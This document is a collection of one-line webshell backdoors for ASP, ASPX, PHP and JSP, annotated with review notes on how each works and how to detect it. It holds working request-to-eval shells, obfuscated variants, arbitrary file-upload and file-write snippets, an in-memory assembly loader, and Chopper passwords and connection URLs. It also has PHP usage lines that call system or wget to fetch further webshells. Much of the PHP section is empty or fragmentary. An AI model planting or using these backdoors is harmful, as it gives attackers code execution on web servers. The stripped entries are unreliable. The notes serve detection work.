====================================================== || ASP一句话 || ======================================================
<% ' NOTE(review): every entry below hands an HTTP request parameter to VBScript Eval/Execute, %>
<% ' so any client that can reach the page runs script with the rights of the web application. %>
<% ' No entry has a legitimate application use; a match inside a web root is a backdoor finding. %>
----------------------------------------
<% re= request("sb") if re <>"" then execute re response.end end if %>
----------------------------------------
<% ' NOTE(review): chr(112) spells the parameter name "p" without a string literal. %>
<% ' 39 = ReadOnly(1) + Hidden(2) + System(4) + Archive(32), so the page marks its own file hidden and system. %>
<% ' Enumerate web roots with hidden and system files shown when hunting for this one. %>
<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>
----------------------------------------
<% ' NOTE(review): DeCode subtracts 3 from each character code, so the Execute argument never appears in clear text. %>
<% ' The entry's own trailing comment indicates it decodes to the same request-to-eval pattern. %>
<% ' Match on Execute/Eval applied to a function result, not on keywords alone. %>
<% codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li" execute (decode (codeds) ) Function DeCode (Coded) On Error Resume Next For i = 1 To Len (Coded) Curchar = Mid (Coded, i, 1) If Asc (Curchar) = 16 then Curchar = chr (8) Elseif Asc (Curchar) = 24 then Curchar = chr (12) Elseif Asc (Curchar) = 32 then Curchar = chr (18) Else Curchar = chr (Asc (Curchar) -3) End if DeCode = Decode&Curchar Next End Function 'response.write(decode(codeds)) ' Chopper (caidao) client connects to /hkmjj.asp?xx=x , password hkmjj %>
----------------------------------------
<% dim x1,x2 x1 = request("pass") x2 = x1 eval x2 %>
----------------------------------------
<% ' NOTE(review): the statement is stored reversed (StrReverse) with its quotes replaced by /*/, again to defeat literal matching. %>
<% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) End Function Execute MorfiCoder(")/*/z/*/(tseuqer lave") %> Password: z
----------------------------------------
<%a=request("cmd")%><%eval a%>
----------------------------------------
<% ' NOTE(review): the chr() codes 114,101,113,117,101,115,116 spell "request"; the inner eval turns that string into the object. %>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%>
----------------------------------------
<%execute(request("xiaoma"))%>
----------------------------------------
<% ' NOTE(review): the next two entries are fragments, not pages: each opens with a quote that would close an existing string. %>
<% ' Presumably they target applications that write form input into .asp files (settings, includes) - confirm. %>
<% ' Such writers must escape quotes and the ASP script delimiters, or keep settings in a non-executable store. %>
1":eval request("a")'
----------------------------------------
"%><%eval request("a")%><%'"
----------------------------------------
<%Y=request("x")%> <%execute(Y)%>
----------------------------------------
<%eval request("xiaoma")%>
----------------------------------------
<% ' NOTE(review): the CJK-looking text below appears to be a script block stored as double-byte characters - TODO confirm. %>
<% ' Content scanners should inspect files under both single-byte and UTF-16 interpretations. %>
┼癥污爠煥敵瑳∨≡┩愾 password: a
----------------------------------------
====================================================== || ASPX一句话 || ======================================================
<%-- NOTE(review): in JScript.NET, eval(..., "unsafe") runs the string with the permissions of the calling page instead of
     a restricted context. Application code has no reason to pass request data to it. The entries below differ
     only in how they hide that call or avoid it. --%>
----------------------------------------
<%-- NOTE(review): string concatenation and comment padding keep "eval", "Request" and "unsafe" from appearing as
     contiguous text. Strip comments and fold constant concatenations before applying signatures. --%>
<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>
----------------------------------------
<% @Page Language="Jscript"%><%eval(Request.Item["hucxsz"],"unsafe");%>
----------------------------------------
<%-- NOTE(review): the next two entries (brace syntax, then VB syntax) contain no eval at all. Each saves the first uploaded
     file to Server.MapPath of the request parameter "f", i.e. a path the caller chooses. Keyword scanners
     miss them; the controls that matter are no write permission for the application identity inside the
     web root and no script execution in any directory it can write to. --%>
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
----------------------------------------
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
----------------------------------------
<%-- NOTE(review): the code for this entry is missing from the page; only its password line survives. --%>
Password: webadmin
----------------------------------------
----------------------------------------
<%-- NOTE(review): the Base64 constant decodes to a Request.Item lookup, so the request read is not visible in the source
     text; decode constants before pattern matching. popup is not defined in this fragment - presumably an
     evaluator alias declared elsewhere; confirm. --%>
<% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=")))); %> Password: z
----------------------------------------
<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["xiaoma"],"unsafe"));%>
----------------------------------------
<%-- NOTE(review): reads as many request-body bytes as the "f4ck" cookie states, loads them as a .NET assembly and
     instantiates its type "c" with the page object as constructor argument. This page does not write the
     payload to disk, and the empty catch hides failures, so file scanning finds only this loader.
     ValidateRequest="false" combined with Assembly.Load on Request.BinaryRead output is the pattern to flag. --%>
<%@ Page Language="C#" ValidateRequest="false" %> <%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["f4ck"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
====================================================== || PHP一句话 || ======================================================
<?php /* NOTE(review): most entries in this section are empty; the PHP tags and the code between them appear to have been
   stripped from the page, leaving only trailing fragments and usage lines. */ ?>
----------------------------------------
<?php /* NOTE(review): "JFIF" is the marker found in a JPEG header, so this entry was presumably script appended to image
   bytes - confirm. Re-encode uploaded images server-side and serve upload directories with script execution disabled. */ ?>
?JFIF
----------------------------------------
----------------------------------------
----------------------------------------
----------------------------------------
----------------------------------------
----------------------------------------
----------------------------------------
<?php /* NOTE(review): eval(gzinflate(base64_decode(...))) executes a compressed, encoded payload, so the file holds no
   readable keywords. The call chain itself is the indicator; inflate the string only in an isolated analysis environment. */ ?>
Run eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA=='))); ?>
----------------------------------------
----------------------------------------
----------------------------------------
----------------------------------------
----------------------------------------
----------------------------------------
----------------------------------------
")?>
----------------------------------------
----------------------------------------
----------------------------------------
<?php /* NOTE(review): here and in the ts7=assert entry further down, the function name arrives in the query string, so the
   file on disk presumably contains no eval/assert/system literal (its code is missing from the page). Flag calls
   whose callee is read from the request, and search access logs for parameters whose value is a PHP function name. */ ?>
caidao: http://site/1.php?2=assert Password: 1
----------------------------------------
----------------------------------------
---------------------------------------
<?php /* NOTE(review): only the tail of this entry survives. invokeArgs with both arguments taken from $_GET, together with
   the usage lines passing m=system and m=file_put_contents, indicates the callee is chosen by the request as
   well (presumably via ReflectionFunction - confirm). disable_functions and a document root that the PHP
   user cannot write to limit what such a page can do. */ ?>
invokeArgs(array($_GET[c],$_GET[id])); ?>
shell.php?m=file_put_contents&c=test.php&id= //writes a one-liner webshell, for linux
shell.php?m=file_put_contents&c=test.php&id= //writes a one-liner webshell, for windows
shell.php?m=system&c=echo ^ >test.php //creates a one-liner webshell in the current directory, for windows
shell.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test.php //downloads a one-liner webshell into the current directory, for linux
----------------------------------------
----------------------------------------
caidao: h=@eval($_POST1); Password: sb
----------------------------------------
----------------------------------------
//caidao: http://www.target.com/shell.php?ts7=assert
----------------------------------------
----------------------------------------
');?>
----------------------------------------
key=90sec or Url: http://www.target.com/90sec.php?key=90sec Password: shell
----------------------------------------
====================================================== || JSP一句话 || ======================================================
----------------------------------------
<%-- NOTE(review): when parameter "f" is present, writes the bytes of parameter "t" to the file named by "f" appended to the
     application's real path. The snippet checks neither the caller nor the path, so it is an arbitrary file
     write. Deploy the webapp directory read-only for the container user and alert on .jsp files created
     after deployment. --%>
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
----------------------------------------